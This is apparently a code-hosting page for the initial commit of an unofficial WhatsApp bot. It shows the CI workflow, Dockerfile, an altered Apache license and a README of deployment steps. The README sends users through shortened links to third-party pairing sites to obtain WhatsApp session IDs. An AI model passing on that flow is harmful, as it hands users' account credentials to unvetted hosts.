Encrypto27
commited on
Commit
·
1cbc8c7
1
Parent(s):
6bf1586
Initial commit
Browse filesThis view is limited to 50 files because it contains too many changes.
See raw diff
- .github/workflows/Deploy.yml +33 -0
- Dockerfile +23 -0
- LICENSE +202 -0
- README.md +346 -0
- app.json +182 -0
- command.js +20 -0
- config.js +104 -0
- data/Readme.md +1 -0
- data/autoreply.json +17 -0
- data/autosticker.json +7 -0
- data/autovoice.json +37 -0
- index.js +5 -0
- lib/Readme.md +1 -0
- lib/functions.js +1 -0
- lib/msg.js +1 -0
- lib/subzero.html +179 -0
- package.json +48 -0
- plugins/Readme.md +1 -0
- plugins/SUBZERO.js +16 -0
- plugins/ai-flux.js +6 -0
- plugins/ai-models.js +207 -0
- plugins/ai-nothing.js +4 -0
- plugins/ai-stablediffusion.js +1 -0
- plugins/convert-logo.js +221 -0
- plugins/convert-sticker.js +286 -0
- plugins/convert-tourl.js +220 -0
- plugins/dl-gitclone.js +217 -0
- plugins/dl-movie.js +217 -0
- plugins/dl-play2.js +47 -0
- plugins/dl-play3.js +217 -0
- plugins/dl-spotify.js +217 -0
- plugins/dl-tiktok.js +217 -0
- plugins/fun-anime.js +217 -0
- plugins/fun-couples.js +217 -0
- plugins/fun-dogs.js +217 -0
- plugins/fun-loli.js +217 -0
- plugins/fun-nsfw.js +406 -0
- plugins/fun-quote.js +245 -0
- plugins/fun-randomwallpaper.js +221 -0
- plugins/fun-tools.js +220 -0
- plugins/gc-antitools.js +220 -0
- plugins/gc-delete.js +249 -0
- plugins/gc-kickall.js +221 -0
- plugins/gc-period.js +708 -0
- plugins/hack-prank.js +266 -0
- plugins/main-about.js +226 -0
- plugins/main-alive.js +217 -0
- plugins/main-beta-menu.js +217 -0
- plugins/main-download.js +222 -0
- plugins/main-group.js +220 -0
.github/workflows/Deploy.yml
ADDED
@@ -0,0 +1,33 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
name: Node.js CI
|
2 |
+
|
3 |
+
on:
|
4 |
+
push:
|
5 |
+
branches:
|
6 |
+
- main
|
7 |
+
pull_request:
|
8 |
+
branches:
|
9 |
+
- main
|
10 |
+
|
11 |
+
jobs:
|
12 |
+
build:
|
13 |
+
|
14 |
+
runs-on: ubuntu-latest
|
15 |
+
|
16 |
+
strategy:
|
17 |
+
matrix:
|
18 |
+
node-version: [20.x]
|
19 |
+
|
20 |
+
steps:
|
21 |
+
- name: Checkout repository
|
22 |
+
uses: actions/checkout@v3
|
23 |
+
|
24 |
+
- name: Set up Node.js
|
25 |
+
uses: actions/setup-node@v3
|
26 |
+
with:
|
27 |
+
node-version: ${{ matrix.node-version }}
|
28 |
+
|
29 |
+
- name: Install dependencies
|
30 |
+
run: npm install
|
31 |
+
|
32 |
+
- name: Start application
|
33 |
+
run: npm start
|
Dockerfile
ADDED
@@ -0,0 +1,23 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
|
2 |
+
FROM node:lts-buster
|
3 |
+
|
4 |
+
Install Git and other dependencies
|
5 |
+
RUN apt-get update && \
|
6 |
+
apt-get install -y \
|
7 |
+
git \
|
8 |
+
ffmpeg \
|
9 |
+
imagemagick \
|
10 |
+
webp && \
|
11 |
+
apt-get upgrade -y && \
|
12 |
+
rm -rf /var/lib/apt/lists/*
|
13 |
+
|
14 |
+
Copy package.json and install dependencies
|
15 |
+
COPY package.json .
|
16 |
+
RUN npm install && npm install -g qrcode-terminal pm2
|
17 |
+
|
18 |
+
Copy application code
|
19 |
+
COPY . .
|
20 |
+
|
21 |
+
Expose port and set command
|
22 |
+
EXPOSE 3000
|
23 |
+
CMD ["pm2-runtime", "start", "index.js"]
|
LICENSE
ADDED
@@ -0,0 +1,202 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
Apache License
|
2 |
+
Version 2.0, January 2004
|
3 |
+
http://www.apache.org/licenses/
|
4 |
+
|
5 |
+
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
|
6 |
+
|
7 |
+
1. Definitions.
|
8 |
+
|
9 |
+
"License" shall mean the terms and conditions for use, reproduction,
|
10 |
+
and distribution as defined by Sections 1 through 9 of this document.
|
11 |
+
|
12 |
+
"Licensor" shall mean the copyright owner or entity authorized by
|
13 |
+
the copyright owner that is granting the License.
|
14 |
+
|
15 |
+
"Legal Entity" shall mean the union of the acting entity and all
|
16 |
+
other entities that control, are controlled by, or are under common
|
17 |
+
control with that entity. For the purposes of this definition,
|
18 |
+
"control" means (i) the power, direct or indirect, to cause the
|
19 |
+
direction or management of such entity, whether by contract or
|
20 |
+
otherwise, or (ii) ownership of fifty percent (50%) or more of the
|
21 |
+
outstanding shares, or (iii) beneficial ownership of such entity.
|
22 |
+
|
23 |
+
"You" (or "Your") shall mean an individual or Legal Entity
|
24 |
+
exercising permissions granted by this License.
|
25 |
+
|
26 |
+
"Source" form shall mean the preferred form for making modifications,
|
27 |
+
including but not limited to software source code, documentation
|
28 |
+
source, and configuration files.
|
29 |
+
|
30 |
+
"Object" form shall mean any form resulting from mechanical
|
31 |
+
transformation or translation of a Source form, including but
|
32 |
+
not limited to compiled object code, generated documentation,
|
33 |
+
and conversions to other media types.
|
34 |
+
|
35 |
+
"Work" shall mean the work of authorship, whether in Source or
|
36 |
+
Object form, made available under the License, as indicated by a
|
37 |
+
copyright notice that is included in or attached to the work
|
38 |
+
(an example is provided in the Appendix below).
|
39 |
+
|
40 |
+
"Derivative Works" shall mean any work, whether in Source or Object
|
41 |
+
form, that is based on (or derived from) the Work and for which the
|
42 |
+
editorial revisions, annotations, elaborations, or other modifications
|
43 |
+
represent, as a whole, an original work of authorship. For the purposes
|
44 |
+
of this License, Derivative Works shall not include works that remain
|
45 |
+
separable from, or merely link (or bind by name) to the interfaces of,
|
46 |
+
the Work and Derivative Works thereof.
|
47 |
+
|
48 |
+
"Contribution" shall mean any work of authorship, including
|
49 |
+
the original version of the Work and any modifications or additions
|
50 |
+
to that Work or Derivative Works thereof, that is intentionally
|
51 |
+
submitted to Licensor for inclusion in the Work by the copyright owner
|
52 |
+
or by an individual or Legal Entity authorized to submit on behalf of
|
53 |
+
the copyright owner. For the purposes of this definition, "submitted"
|
54 |
+
means any form of electronic, verbal, or written communication sent
|
55 |
+
to the Licensor or its representatives, including but not limited to
|
56 |
+
communication on electronic mailing lists, source code control systems,
|
57 |
+
and issue tracking systems that are managed by, or on behalf of, the
|
58 |
+
Licensor for the purpose of discussing and improving the Work, but
|
59 |
+
excluding communication that is conspicuously marked or otherwise
|
60 |
+
designated in writing by the copyright owner as "Not a Contribution."
|
61 |
+
|
62 |
+
"Contributor" shall mean Licensor and any individual or Legal Entity
|
63 |
+
on behalf of whom a Contribution has been received by Licensor and
|
64 |
+
subsequently incorporated within the Work.
|
65 |
+
|
66 |
+
2. Grant of Copyright License. Subject to the terms and conditions of
|
67 |
+
this License, each Contributor hereby grants to You a perpetual,
|
68 |
+
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
69 |
+
copyright license to reproduce, prepare Derivative Works of,
|
70 |
+
publicly display, publicly perform, sublicense, and distribute the
|
71 |
+
Work and such Derivative Works in Source or Object form.
|
72 |
+
|
73 |
+
3. Grant of Patent License. Subject to the terms and conditions of
|
74 |
+
this License, each Contributor hereby grants to You a perpetual,
|
75 |
+
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
|
76 |
+
(except as stated in this section) patent license to make, have made,
|
77 |
+
use, offer to sell, sell, import, and otherwise transfer the Work,
|
78 |
+
where such license applies only to those patent claims licensable
|
79 |
+
by such Contributor that are necessarily infringed by their
|
80 |
+
Contribution(s) alone or by combination of their Contribution(s)
|
81 |
+
with the Work to which such Contribution(s) was submitted. If You
|
82 |
+
institute patent litigation against any entity (including a
|
83 |
+
cross-claim or counterclaim in a lawsuit) alleging that the Work
|
84 |
+
or a Contribution incorporated within the Work constitutes direct
|
85 |
+
or contributory patent infringement, then any patent licenses
|
86 |
+
granted to You under this License for that Work shall terminate
|
87 |
+
as of the date such litigation is filed.
|
88 |
+
|
89 |
+
4. Redistribution. You may reproduce and distribute copies of the
|
90 |
+
Work or Derivative Works thereof in any medium, with or without
|
91 |
+
modifications, and in Source or Object form, provided that You
|
92 |
+
meet the following conditions:
|
93 |
+
|
94 |
+
(a) You must give any other recipients of the Work or
|
95 |
+
Derivative Works a copy of this License; and
|
96 |
+
|
97 |
+
(b) You must cause any modified files to carry prominent notices
|
98 |
+
stating that You changed the files; and
|
99 |
+
|
100 |
+
(c) You must retain, in the Source form of any Derivative Works
|
101 |
+
that You distribute, all copyright, patent, trademark, and
|
102 |
+
attribution notices from the Source form of the Work,
|
103 |
+
excluding those notices that do not pertain to any part of
|
104 |
+
the Derivative Works; and
|
105 |
+
|
106 |
+
(d) If the Work includes a "NOTICE" text file as part of its
|
107 |
+
distribution, then any Derivative Works that You distribute must
|
108 |
+
include a readable copy of the attribution notices contained
|
109 |
+
within such NOTICE file, excluding those notices that do not
|
110 |
+
pertain to any part of the Derivative Works, in at least one
|
111 |
+
of the following places: within a NOTICE text file distributed
|
112 |
+
as part of the Derivative Works; within the Source form or
|
113 |
+
documentation, if provided along with the Derivative Works; or,
|
114 |
+
within a display generated by the Derivative Works, if and
|
115 |
+
wherever such third-party notices normally appear. The contents
|
116 |
+
of the NOTICE file are for informational purposes only and
|
117 |
+
do not modify the License. You may add Your own attribution
|
118 |
+
notices within Derivative Works that You distribute, alongside
|
119 |
+
or as an addendum to the NOTICE text from the Work, provided
|
120 |
+
that such additional attribution notices cannot be construed
|
121 |
+
as modifying the License.
|
122 |
+
|
123 |
+
You may add Your own copyright statement to Your modifications and
|
124 |
+
may provide additional or different license terms and conditions
|
125 |
+
for use, reproduction, or distribution of Your modifications, or
|
126 |
+
for any such Derivative Works as a whole, provided Your use,
|
127 |
+
reproduction, and distribution of the Work otherwise complies with
|
128 |
+
the conditions stated in this License.
|
129 |
+
|
130 |
+
5. Submission of Contributions. Unless You explicitly state otherwise,
|
131 |
+
any Contribution intentionally submitted for inclusion in the Work
|
132 |
+
by You to the Licensor shall be under the terms and conditions of
|
133 |
+
this License, without any additional terms or conditions.
|
134 |
+
Notwithstanding the above, nothing herein shall supersede or modify
|
135 |
+
the terms of any separate license agreement you may have executed
|
136 |
+
with Licensor regarding such Contributions.
|
137 |
+
|
138 |
+
6. Trademarks. This License does not grant permission to use the trade
|
139 |
+
names, trademarks, service marks, or product names of the Licensor,
|
140 |
+
except as required for reasonable and customary use in describing the
|
141 |
+
origin of the Work and reproducing the content of the NOTICE file.
|
142 |
+
|
143 |
+
7. Disclaimer of Warranty. Unless required by applicable law or
|
144 |
+
agreed to in writing, Licensor provides the Work (and each
|
145 |
+
Contributor provides its Contributions) on an "AS IS" BASIS,
|
146 |
+
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
|
147 |
+
implied, including, without limitation, any warranties or conditions
|
148 |
+
of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
|
149 |
+
PARTICULAR PURPOSE. You are solely responsible for determining the
|
150 |
+
appropriateness of using or redistributing the Work and assume any
|
151 |
+
risks associated with Your exercise of permissions under this License.
|
152 |
+
|
153 |
+
8. Limitation of Liability. In no event and under no legal theory,
|
154 |
+
whether in tort (including negligence), contract, or otherwise,
|
155 |
+
unless required by applicable law (such as deliberate and grossly
|
156 |
+
negligent acts) or agreed to in writing, shall any Contributor be
|
157 |
+
liable to You for damages, including any direct, indirect, special,
|
158 |
+
incidental, or consequential damages of any character arising as a
|
159 |
+
result of this License or out of the use or inability to use the
|
160 |
+
Work (including but not limited to damages for loss of goodwill,
|
161 |
+
work stoppage, computer failure or malfunction, or any and all
|
162 |
+
other commercial damages or losses), even if such Contributor
|
163 |
+
has been advised of the possibility of such damages.
|
164 |
+
|
165 |
+
9. Accepting Warranty or Additional Liability. While redistributing
|
166 |
+
the Work or Derivative Works thereof, You may choose to offer,
|
167 |
+
and charge a fee for, acceptance of support, warranty, indemnity,
|
168 |
+
or other liability obligations and/or rights consistent with this
|
169 |
+
License. However, in accepting such obligations, You may act only
|
170 |
+
on Your own behalf and on Your sole responsibility, not on behalf
|
171 |
+
This Project belongs to Mr Frank
|
172 |
+
of any other Contributor, and only if You agree to indemnify,
|
173 |
+
defend, and hold each Contributor harmless for any liability
|
174 |
+
incurred by, or claims asserted against, such Contributor by reason
|
175 |
+
of your accepting any such warranty or additional liability.
|
176 |
+
|
177 |
+
END OF TERMS AND CONDITIONS
|
178 |
+
|
179 |
+
APPENDIX: How to apply the Apache License to your work.
|
180 |
+
|
181 |
+
To apply the Apache License to your work, attach the following
|
182 |
+
boilerplate notice, with the fields enclosed by brackets "[]"
|
183 |
+
replaced with your own identifying information. (Don't include
|
184 |
+
the brackets!) The text should be enclosed in the appropriate
|
185 |
+
comment syntax for the file format. We also recommend that a
|
186 |
+
file or class name and description of purpose be included on the
|
187 |
+
same "printed page" as the copyright notice for easier
|
188 |
+
identification within third-party archives.
|
189 |
+
|
190 |
+
Copyright [2024] [Mr Frank]
|
191 |
+
|
192 |
+
Licensed under the Apache License, Version 2.0 (the "License");
|
193 |
+
you may not use this file except in compliance with the License.
|
194 |
+
You may obtain a copy of the License at
|
195 |
+
|
196 |
+
http://www.apache.org/licenses/LICENSE-2.0
|
197 |
+
|
198 |
+
Unless required by applicable law or agreed to in writing, software
|
199 |
+
distributed under the License is distributed on an "AS IS" BASIS,
|
200 |
+
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
|
201 |
+
See the License for the specific language governing permissions and
|
202 |
+
limitations under the License.
|
README.md
ADDED
@@ -0,0 +1,346 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
<p align="center">
|
2 |
+
<h1 align="center">❄️ Encrypto-MD ❄️</h1>
|
3 |
+
</p>
|
4 |
+
|
5 |
+
<p align="center">
|
6 |
+
<a href="https://github.com/mrfrank-ofc/followers"><img title="Followers" src="https://img.shields.io/github/followers/mrfrank-ofc?color=blue&style=flat-square"></a>
|
7 |
+
<a href="https://github.com/mrfrank-ofc/SUBZERO-MD/stargazers/"><img title="Stars" src="https://img.shields.io/github/stars/mrfrank-ofc/SUBZERO-MD?color=blue&style=flat-square"></a>
|
8 |
+
<a href="https://github.com/mrfrank-ofc/SUBZERO-MD/network/members"><img title="Forks" src="https://img.shields.io/github/forks/mrfrank-ofc/SUBZERO-MD?color=blue&style=flat-square"></a>
|
9 |
+
<a href="https://github.com/mrfrank-ofc/SUBZERO-MD/"><img title="Size" src="https://img.shields.io/github/repo-size/mrfrank-ofc/SUBZERO-MD?style=flat-square&color=green"></a>
|
10 |
+
<a href="https://github.com/mrfrank-ofc/SUBZERO-MD/graphs/commit-activity"><img height="20" src="https://img.shields.io/badge/Maintained%3F-yes-green.svg"></a>
|
11 |
+
</p>
|
12 |
+
<p align='center'>
|
13 |
+
</p>
|
14 |
+
|
15 |
+
> **`Current Bot Version ➜ 2.3`**
|
16 |
+
---
|
17 |
+
|
18 |
+
```
|
19 |
+
Dont forget to fork 🍴 & star 🌟 repo😇
|
20 |
+
```
|
21 |
+
---
|
22 |
+
|
23 |
+
<p align="center">
|
24 |
+
<a href="https://github.com/mrfrank-ofc">
|
25 |
+
<img src="http://readme-typing-svg.herokuapp.com?color=blue¢er=true&vCenter=true&multiline=false&lines=ENCRYPTO-MD-+MultiDevice;Developed+by+Dudas;Give+star+and+fork+this+Repo+bro+🌟" alt="mrfrankReadme">
|
26 |
+
</a>
|
27 |
+
</p>
|
28 |
+
|
29 |
+
---
|
30 |
+
|
31 |
+
<a><img src='https://i.ibb.co/zxgrymc/IMG-20250113-WA0336.jpg'/></a>
|
32 |
+
|
33 |
+
<a><img src='https://i.imgur.com/LyHic3i.gif'/></a>
|
34 |
+
|
35 |
+
***
|
36 |
+
|
37 |
+
<p align="center">
|
38 |
+
<a href="https://github.com/mrfrank-ofc"><img title="Developer" src="https://img.shields.io/badge/Author-Mr%20Frank-397604.svg?style=for-the-badge&logo=github" /></a>
|
39 |
+
</p>
|
40 |
+
|
41 |
+
<div align="center">
|
42 |
+
|
43 |
+
[](https://whatsapp.com/channel/0029VagQEmB002T7MWo3Sj1D)
|
44 |
+
</div>
|
45 |
+
|
46 |
+
<p align="center"><img src="https://profile-counter.glitch.me/{SUBZERO-MD}/count.svg" alt="mrfrank-ofc :: Visitor's Count" old_src="https://profile-counter.glitch.me/{mrfrank-ofc}/count.svg" /></p>
|
47 |
+
|
48 |
+
|
49 |
+
<p align="center">
|
50 |
+
<a href="https://github.com/mrfrank-ofc/SUBZERO-MD"><img title="PUBLIC-BOT" src="https://img.shields.io/static/v1?label=Language&message=English&style=flat-square&color=darkpink"></a>
|
51 |
+
<img src="https://komarev.com/ghpvc/?username=SUBZERO-MD&label=VIEWS&style=flat-square&color=blue" />
|
52 |
+
</p>
|
53 |
+
</p>
|
54 |
+
|
55 |
+
<p align="center">
|
56 |
+
<a href="https://github.com/mrfrank-ofc/SUBZERO-MD"><img title="Release" src="https://img.shields.io/badge/Release-beta%20v2.0-darkcyan.svg?style=for-the-badge&logo=appveyor" /></a>
|
57 |
+
</p>
|
58 |
+
|
59 |
+
|
60 |
+
***
|
61 |
+
|
62 |
+
### 1. Fork This Repository
|
63 |
+
|
64 |
+
Start by forking this repository to your own GitHub account. Click the button below to fork:
|
65 |
+
|
66 |
+
<a href="https://github.com/mrfrank-ofc/SUBZERO-MD/fork"><img title="Encrypto-MD" src="https://img.shields.io/badge/FORK-SUBZERO-MDh?color=blue&style=for-the-badge&logo=stackshare"></a>
|
67 |
+
|
68 |
+
### 2. Get Session ID
|
69 |
+
|
70 |
+
You will need a session ID to run the SUBZERO-MD. Click the button below to obtain your session ID.if any error in loading site try vpn:
|
71 |
+
|
72 |
+
> **1️⃣Pair Code (Session ID)**
|
73 |
+
|
74 |
+
<a href='https://tinyurl.com/subzero-md-session-id' target="_blank">
|
75 |
+
<img alt='Pairing Code' src='https://img.shields.io/badge/Get%20Pairing%20Code-orange?style=for-the-badge&logo=opencv&logoColor=black'/>
|
76 |
+
</a>
|
77 |
+
<br>
|
78 |
+
|
79 |
+
> **2️⃣Pair Code (Session ID)**
|
80 |
+
|
81 |
+
<a href='https://ultra-subzero-md.onrender.com/' target="_blank">
|
82 |
+
<img alt='Pairing Code' src='https://img.shields.io/badge/Get%20Pairing%20Code-darkpink?style=for-the-badge&logo=opencv&logoColor=black'/>
|
83 |
+
</a>
|
84 |
+
<br>
|
85 |
+
|
86 |
+
> **3️⃣Pair Code (Session ID)**
|
87 |
+
|
88 |
+
<a href='https://subzeropq.onrender.com' target="_blank">
|
89 |
+
<img alt='Pairing Code' src='https://img.shields.io/badge/Get%20Pairing%20Code-cyan?style=for-the-badge&logo=opencv&logoColor=black'/>
|
90 |
+
</a>
|
91 |
+
<br>
|
92 |
+
|
93 |
+
---
|
94 |
+
|
95 |
+
<h2 align="center">Encrypto Deployment Options</h2>
|
96 |
+
|
97 |
+
---
|
98 |
+
|
99 |
+
<h4 align="center">1. Heroku</h4>
|
100 |
+
<p style="text-align: center; font-size: 1.2em;">
|
101 |
+
|
102 |
+
|
103 |
+
<p align="center">
|
104 |
+
<a href='https://dashboard.heroku.com/new?template=https://github.com/mrfrank-ofc/SUBZERO-MD/tree/main' target="_blank"><img alt='Heroku' src='https://img.shields.io/badge/-heroku deploy-FF004D?style=for-the-badge&logo=heroku&logoColor=white'/< width=150 height=28/p></a>
|
105 |
+
|
106 |
+
----------
|
107 |
+
|
108 |
+
<h4 align="center">2. TalkDrove Free</h4>
|
109 |
+
<p style="text-align: center; font-size: 1.2em;">
|
110 |
+
|
111 |
+
<p align="center">
|
112 |
+
<a href='https://talkdrove.com/share-bot/66' target="_blank"><img alt='Heroku' src='https://img.shields.io/badge/-TalkDrove Deploy-6971FF?style=for-the-badge&logo=Github&logoColor=white'/< width=150 height=28/p></a>
|
113 |
+
|
114 |
+
<details>
|
115 |
+
|
116 |
+
<b><strong><summary align="center" style="color: Yello;">EASIEST METHOD</summary></strong></b>
|
117 |
+
<p style="text-align: center; font-size: 1.2em;">
|
118 |
+
|
119 |
+
|
120 |
+
<h3 align="center"> HOW TO DEPLOY ON TALKDROVE</h3>
|
121 |
+
<h6 align-"center">
|
122 |
+
Create Account Here:
|
123 |
+
|
124 |
+
https://host.talkdrove.com/auth/signup?ref=9535F15A
|
125 |
+
|
126 |
+
Then Login
|
127 |
+
Claim 10 coins in wallet section
|
128 |
+
Locate where to deploy your bot
|
129 |
+
You will see a dashboard of bots listed
|
130 |
+
|
131 |
+
|
132 |
+
Click next , next
|
133 |
+
Until you see SUBZERO MD
|
134 |
+
Then click on it
|
135 |
+
|
136 |
+
You will be asked to fill in some stuffs like your session Id , and other stuffs on how you want your bot to be ( bot settings ) , it's not hard I added examples
|
137 |
+
|
138 |
+
|
139 |
+
Get session I'd here:
|
140 |
+
|
141 |
+
https://tinyurl.com/subzero-md-session-id
|
142 |
+
|
143 |
+
After you're done filling it
|
144 |
+
Click deploy button
|
145 |
+
|
146 |
+
If you can't see any deploy button , switch the website to dark mode
|
147 |
+
|
148 |
+
It will show
|
149 |
+
|
150 |
+
That's all bot connected
|
151 |
+
|
152 |
+
`MR FRANK OFC`</h6>
|
153 |
+
</details>
|
154 |
+
|
155 |
+
--------------
|
156 |
+
|
157 |
+
|
158 |
+
<h4 align="center">3. Koyeb</h4>
|
159 |
+
<p style="text-align: center; font-size: 1.2em;">
|
160 |
+
|
161 |
+
|
162 |
+
<p align="center">
|
163 |
+
<a href='https://app.koyeb.com/services/deploy?type=git&repository=mrfrank-ofc/SUBZERO-MD&ports=3000&env[PREFIX]=.&env[SESSION_ID]=&env[ALWAYS_ONLINE]=false&env[MODE]=public&env[AUTO_STATUS_MSG]=Seen%20status%20by%20SUBZERO-MD&env[AUTO_STATUS_REPLY]=false&env[AUTO_STATUS_SEEN]=true&env[AUTO_TYPING]=false&env[ANTI_LINK]=true&env[AUTO_REACT]=false&env[READ_MESSAGE]=false' target="_blank"><img alt='Heroku' src='https://img.shields.io/badge/-koyeb deploy-FF009D?style=for-the-badge&logo=koyeb&logoColor=white'/< width=150 height=28/p></a>
|
164 |
+
|
165 |
+
-----
|
166 |
+
<h4 align="center">4. Railway</h4>
|
167 |
+
<p style="text-align: center; font-size: 1.2em;">
|
168 |
+
|
169 |
+
<p align="center">
|
170 |
+
<a href='https://railway.app/new' target="_blank"><img alt='Heroku' src='https://img.shields.io/badge/-railway deploy-FF8700?style=for-the-badge&logo=railway&logoColor=white'/< width=150 height=28/p></a>
|
171 |
+
|
172 |
+
-----
|
173 |
+
|
174 |
+
<h4 align="center">5. Render</h4>
|
175 |
+
<p style="text-align: center; font-size: 1.2em;">
|
176 |
+
|
177 |
+
<p align="center">
|
178 |
+
<a href='https://dashboard.render.com/web/new' target="_blank"><img alt='Heroku' src='https://img.shields.io/badge/-Render deploy-black?style=for-the-badge&logo=render&logoColot=white'/< width=150 height=28/p></a>
|
179 |
+
--------
|
180 |
+
|
181 |
+
<h4 align="center">6. Hugging Face</h4>
|
182 |
+
<p style="text-align: center; font-size: 1.2em;">
|
183 |
+
|
184 |
+
<p align="center">
|
185 |
+
<a href='https://app.netlify.com/' target="_blank"><img alt='Netlify' src='https://img.shields.io/badge/-Netlify Deploy-CC00FF?style=for-the-badge&logo=huggingface&logoColor=white'/< width=150 height=28/p></a> </a>
|
186 |
+
|
187 |
+
<details>
|
188 |
+
|
189 |
+
<b><strong><summary align="center" style="color: Yello;">EASIEST METHOD 2</summary></strong></b>
|
190 |
+
<p style="text-align: center; font-size: 1.2em;">
|
191 |
+
|
192 |
+
|
193 |
+
<h3 align="center"> HOW TO DEPLOY ON HUGGING FACE</h3>
|
194 |
+
<h6 align-"center">
|
195 |
+
*❄️ Deploy Encrypto On Hugging Face For Free !*
|
196 |
+
|
197 |
+
`Specs :`
|
198 |
+
- v2 CPU
|
199 |
+
- 16GB RAM
|
200 |
+
|
201 |
+
> `Steps to deploy`
|
202 |
+
|
203 |
+
`Step 1`
|
204 |
+
1. Go to hugginface.co/join and create an account and verify your email too.
|
205 |
+
|
206 |
+
`Step 2`
|
207 |
+
1. Go to https://huggingface.co/spaces/mrfrank-ofc/SUBZERO-MD
|
208 |
+
|
209 |
+
2. Tap on *three dots* _(as shown in image)_
|
210 |
+
|
211 |
+
3. Tap on *duplicate space* _(as shown in image)_
|
212 |
+
|
213 |
+
`Step 3`
|
214 |
+
1. Fill your details, e.g., Session ID, Bot Name, owner number etc...
|
215 |
+
|
216 |
+
2. Tap on *duplicate space shown below*
|
217 |
+
|
218 |
+
```After that wait 10 seconds & your have deployed it successfuly for free 24/7```
|
219 |
+
|
220 |
+
> CREDITS PIKABOTZ🎐
|
221 |
+
|
222 |
+
*ᴘᴏᴡᴇʀᴇᴅ ʙʏ ᴍʀ ꜰʀᴀɴᴋ ᴏꜰᴄ*</h6>
|
223 |
+
|
224 |
+
</details>
|
225 |
+
|
226 |
+
--------------
|
227 |
+
|
228 |
+
|
229 |
+
<h4 align="center">7. Replit</h4>
|
230 |
+
